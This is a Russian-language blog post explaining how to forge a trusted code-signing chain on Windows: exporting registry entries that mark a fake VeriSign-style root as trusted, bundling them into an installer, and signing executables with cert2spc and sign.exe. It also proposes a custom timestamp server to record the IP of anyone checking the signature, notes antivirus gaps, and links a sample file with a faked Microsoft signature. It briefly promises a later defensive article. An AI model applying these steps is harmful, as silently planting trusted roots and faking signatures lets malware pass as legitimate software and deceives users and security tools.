В Windows имеется возможность установки любого сертификата, в том числе и самоподписанного, в качестве доверенного. Это удобно: в ряде случаев разработчик может сделать себе самоподписанный сертификат, ввести его в доверенные и спокойно работать со своими приложениям. В нашем случае это удобно вдвойне, потому как такой внос — очевидно, простое внесение информации в реестр. при чём информации отнюдь не специфичной для конкретной системы.

Установим на нашу тестовую виртуалку любой монитор реестра, после чего внесём наш искомый сертификат от якобы VeriSign в доверенные. Отследим, где произошло изменение — и voila! Мы можем сделать дамп соответствующей ветки реестра, после чего засунуть её в инсталлер. В итого, наш инсталлер вносит в реестр инфу, автоматически превращая сертификат первичного издателя в доверенный и валидируя всю цепочку.

Чтобы окончательно не открывать все карты, скажу только, что в моём случае дамп реестра имел вид
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSystemCertificatesAuthRootCertificatesA61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
“Blob”=hex:04,00,00,…..

ну или если только для текущего пользователя, то
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERSoftwareMicrosoftSystemCertificatesRootCertificatesA61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
“Blob”=hex:04,00,00,…..

Внеся в реестр эти данные, программа с фэйковой цепочкой подписи автоматом проходила проверку по sigverif.exe. Ну а подписать наш код с помощью полученного сертификата вообще просто, достаточно батника:

cert2spc.exe kl.cer kl.spc
sign.exe -spc kl.spc -v kl.pvk -n "My Installer" -i "http://habrahabr.ru" -ky signature -$ commercial -a sha1 -t "http://timestamp.verisign.com/scripts/timstamp.dll" myprogram.exe
del kl.spc

Обратите внимание на использование таймстампа timestamp.verisign.com/scripts/timstamp.dll — теоретически вполне возможно использование собственного сервера на собственном домене, что позволит каждый раз видеть, что кто-то проверил подпись нашей программы на своём компьютере, а значит получать IP и время проверки. Правда удобно? 😉

Самое забавное, что на момент написания материала в далёком октябре-ноябре 2021-го Kaspersky Internet Security 2021 не отслеживала указанные ветки реестра, а проверку валидности цепочки оставляла на усмотрение ОС, которую мы довольно просто надули. Не знаю, что сейчас, но вроде как некоторые ветки заблокировали… Проверяйте, отписывайтесь!

Нужно отметить, что для простановки подписей возможно использование и специфичного, недоступного в паблике софта. Понятно, что подписи он не ломает, но даёт куда более гибкие возможности для заполнения полей X500, что ещё лучше создаёт видимость валидности. Вот тут возможно скачать любопытный пример. В архиве — файл популярной замены Блокноту bred3_2k (офсайт) с и без подписи Microsoft 🙂 Чтобы подпись полностью стала валидной, достаточно внести в реестр изменения, содержащиеся в файле key .reg. Аналогично, файл key -.reg эти изменения отменяет. Отследите путь сертификации — он любопытен 🙂

Сразу обращаю внимание на то, что автор «примера» прописал собственный таймстамп-сервер, так что любые манипуляции приведут к тому, что автор узнает Ваш IP — и дальше, как описывалось. Если хотите, то можете отследить эти обращения и отписаться в комментах 😉

Если потребуется, в следующей статье я расскажу, как настроить хипс для защиты соответсвующих веток реестра во избежание описанного внесения сертификатов в доверенные. Отписывайтесь в комментах — возможно, что эту уязвимость уже пофиксили.

В статье использован материал презентации Jarno Niemela (F-Secure).

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector